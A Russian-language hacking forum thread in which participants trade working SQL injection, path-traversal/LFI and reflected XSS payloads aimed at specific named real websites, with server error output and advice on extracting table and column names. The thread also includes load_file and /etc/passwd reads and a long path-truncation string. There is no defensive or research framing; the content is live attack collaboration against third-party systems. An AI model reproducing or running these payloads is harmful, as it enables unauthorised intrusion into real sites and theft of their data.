На кавычку вроде реагирует, но не знаю, считается ли это SQL-Инъекцией Code: www.chromecrm.com/wyniki-wyszukiwania/?id=109&asId=as0'
select user() показывает что я dbauser@server. в load_file('/etc/hosts') указывается строка: "209.200.x.x server server.site.com" сам сайт находится на ип 209.200.x.x. реальный путь раскрыл, но файлы не читает. Что в данном случае показывает запись в хостсе? не логично ли что я нахожусь на нужной машине и все должно читаться?
GET /m'|(select*from(select+name_const(version(),1),name_const(version(),1))a)='1 однако name_const здесь не сработает, нужен другой вектор. сейчас посмотрю UPD: GET /m'||1%20group%20by%20concat((select%20table_name%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))having%20min(0)='1 SQL: select * from mimik_Menus where lookup_code = 'm'||1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))having min(0)='1'<br/><br/>MySQL_ERROR: Duplicate entry 'CHARACTER_SETS1' for key 1
Code: http://astrodaily.ru/statya.php?s=lol/../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
В догонку к тому что faza02 написал HTML: http://www.coreknowledge.org/mimik/mimik_live_data/view.php?id=194&sp_id=4&type=%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E&q=search поиск.. id=194 строго, все что отличается от этого скул ошибка и SQL: SELECT 1 FROM Fields WHERE type='Group Permission' AND table_id= MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 параметh sp_id, если оставить пустым - ошибка SQL: select name from mimik_Standalone_Pages where id = MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Скорее всего тоже можно раскрутить по образу как faza02 написал... параметр type не фильтруется, что в примере выше и показал, ксс отраженная проходит на ура.
Можно, но трудно: http://www.coreknowledge.org/141241...es`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1
я ж скинул вектор, что не так? там все нормально крутится и не сложно Code: http://www.coreknowledge.org/m%27||1%20group%20by%20concat%28%28select%20table_name%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29having%20min%280%29=%271
Тут можно что нибудь сделать? Code: http://www.woodworkersworkshop.com/resources/index.php?search=asfasfasf
Code: http://www.woodworkersworkshop.com/resources/index.php?search=%27)|updatexml(1,repeat(version(),2),1)%23
Code: http://www.svetodom.ru/brand/1%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28Table_name%29%29%20from%20information_schema.tables%20limit%20100,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1--+/ до таблиц добрался, как дальше выбрать таблицу и узнать столбцы, и узнать информацию в столбцах?
select column_name from information_schema.columns where table_name = TABLE Code: http://www.svetodom.ru/brand/1+and(extractvalue(1,concat(0x3a,(select(column_name)from+information_schema.columns+where+table_name=0x444f434c495354+limit+0,1))))=1/
Ну вообще вроди как права на чтения и ненужны, при той команде что я написал выше. Code: https://rdot.org/forum/showthread.php?t=741
http://sartraccc.ru/i.php?filename=11/book.htm&oper=read_file Ребятa, тут есть LFI Можно как то достучаться до /etc/passwd и /etc/hosts, фильтруется как то непонятно
там фильтр на etc. но в другом скрипте нет: Code: http://sartraccc.ru/print.php?print_file=/etc/passwd
